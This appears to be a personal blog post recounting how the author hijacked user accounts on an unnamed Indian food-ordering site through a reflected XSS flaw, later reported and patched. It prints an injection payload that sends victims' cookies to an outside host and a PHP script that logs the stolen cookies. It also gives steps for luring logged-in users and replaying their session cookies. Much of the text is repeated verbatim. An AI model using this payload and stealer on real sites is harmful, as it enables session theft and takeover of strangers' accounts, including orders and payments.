Hi All,
This blog is about How I managed to hijack user account by exploiting XSS vulnerability in one of the biggest online food company of India. (Can't disclose the name for obvious reason)
Cross site scripting (XSS) is one of the most rampant and yet most underdetermined of web application vulnerabilities.Theft of cookies, personal data, authentication credentials and browser history are probably the less dangerous consequences of XSS attacks.Recently while working on web application vulnerabilities, I found XSS vulnerability in one most popular online food ordering website of India and when I paired it with some social engineering attacks, I was able to takeover user account .
So here are the steps-
1- First I discovered XSS vulnerability in the website.
Couldn't show the POC for it as it got patched.
The basic motive was to get user cookies, so for this, I did the following two steps-
2- So the vulnerable link looked like
https://thevulnerablesite.com/asian?vulnerableparameter="><img src='aa' onerror="this.src='http://mywebsite.com/anyfile.php?cookie='+document.cookie+">
The next step is to lure the user to click on it.
Note- User must be logged into the vulnerable website. Basically user cookies must be saved into user browser.
As user clicks on the malicious link sent to him by the attacker (as here I was the attacker) , I was able to get user cookies in my mailbox.
3- Open your browser (prefer mozilla firefox).Inject the captured cookies using any cookie editor like cookie manager into your browser.
Once you have done, reload the browser and here you are successfully logged in as victim user, having full access over his account.
Suggestions and Feedbacks are welcome. :)
This blog is about How I managed to hijack user account by exploiting XSS vulnerability in one of the biggest online food company of India. (Can't disclose the name for obvious reason)
Cross site scripting (XSS) is one of the most rampant and yet most underdetermined of web application vulnerabilities.Theft of cookies, personal data, authentication credentials and browser history are probably the less dangerous consequences of XSS attacks.Recently while working on web application vulnerabilities, I found XSS vulnerability in one most popular online food ordering website of India and when I paired it with some social engineering attacks, I was able to takeover user account .
So here are the steps-
1- First I discovered XSS vulnerability in the website.
Couldn't show the POC for it as it got patched.
The basic motive was to get user cookies, so for this, I did the following two steps-
- Created a payload which could extract user cookies from the browser.
- Developed a php code to get the user cookies to my mail account.
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("log.txt", "a");
fwrite($steal, $cookie ."\n");
fclose($steal);
?>
2- So the vulnerable link looked like
https://thevulnerablesite.com/asian?vulnerableparameter="><img src='aa' onerror="this.src='http://mywebsite.com/anyfile.php?cookie='+document.cookie+">
The next step is to lure the user to click on it.
Note- User must be logged into the vulnerable website. Basically user cookies must be saved into user browser.
As user clicks on the malicious link sent to him by the attacker (as here I was the attacker) , I was able to get user cookies in my mailbox.
3- Open your browser (prefer mozilla firefox).Inject the captured cookies using any cookie editor like cookie manager into your browser.
Once you have done, reload the browser and here you are successfully logged in as victim user, having full access over his account.
By XSS attack, I have gained full
access to victim user account, can make orders, cancel it, change the mobile
number and perform payment too from his account.
I reported this vulnerability to the concerned organisation on 1st August 2015 and it got patched in December.
I reported this vulnerability to the concerned organisation on 1st August 2015 and it got patched in December.
That's all folk about this vulnerability.
Thanks.
-logicbomb
-logicbomb
Suggestions and Feedbacks are welcome. :)
